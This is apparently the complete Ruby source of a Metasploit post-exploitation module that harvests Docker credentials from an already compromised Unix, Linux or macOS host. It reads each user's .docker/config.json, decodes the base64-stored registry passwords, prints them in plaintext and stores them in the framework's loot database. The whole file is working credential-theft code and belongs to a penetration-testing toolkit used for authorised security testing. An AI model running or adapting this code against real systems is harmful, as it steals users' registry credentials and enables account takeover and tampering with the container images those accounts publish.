Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Post::File
10
  include Msf::Post::Unix
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Multi Gather Docker Credentials Collection',
17
        'Description' => %q{
18
          This module will collect the contents of all users' .docker directories on the targeted
19
          machine. If the user has already push to docker hub, chances are that the password was
20
          saved in base64 (default behavior).
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => ['Flibustier'],
24
        'Platform' => %w[bsd linux osx unix],
25
        'SessionTypes' => ['shell']
26
      )
27
    )
28
  end
29

30
  # This module is largely based on gpg_creds.rb.
31

32
  def run
33
    print_status('Finding .docker directories')
34
    paths = enum_user_directories.map { |d| d + '/.docker' }
35
    # Array#select! is only in 1.9
36
    paths = paths.select { |d| directory?(d) }
37

38
    if paths.nil? || paths.empty?
39
      print_error('No users found with a .docker directory')
40
      return
41
    end
42

43
    download_loot(paths)
44
  end
45

46
  def download_loot(paths)
47
    print_status("Looting #{paths.count} directories")
48
    paths.each do |path|
49
      path.chomp!
50
      file = 'config.json'
51
      target = "#{path}/#{file}"
52

53
      if file? target
54
        print_status("Downloading #{target} -> #{file}")
55
        extract(target)
56
      end
57
    end
58
  end
59

60
  def extract(target)
61
    file = read_file(target)
62
    parsed = JSON.parse(file)
63
    if parsed['auths']
64
      parsed['auths'].each do |key, value|
65
        vprint_status("key: #{key}")
66
        value.each do |k, v|
67
          next unless k == 'auth'
68

69
          plain = Rex::Text.decode_base64(v)
70
          next unless plain.include? ':'
71

72
          print_good("Found #{plain}")
73
          username, password = plain.split(':')
74
          credential_data = {
75
            origin_type: :import,
76
            module_fullname: fullname,
77
            filename: target,
78
            workspace_id: myworkspace_id,
79
            service_name: 'docker',
80
            realm_value: key,
81
            realm_key: Metasploit::Model::Realm::Key::WILDCARD,
82
            private_type: :password,
83
            private_data: password,
84
            username: username
85
          }
86
          create_credential(credential_data)
87

88
          print_good('Saved credentials')
89
        end
90
      end
91
    else
92
      print_status('No credentials found in config file')
93
    end
94
  end
95
end
96

97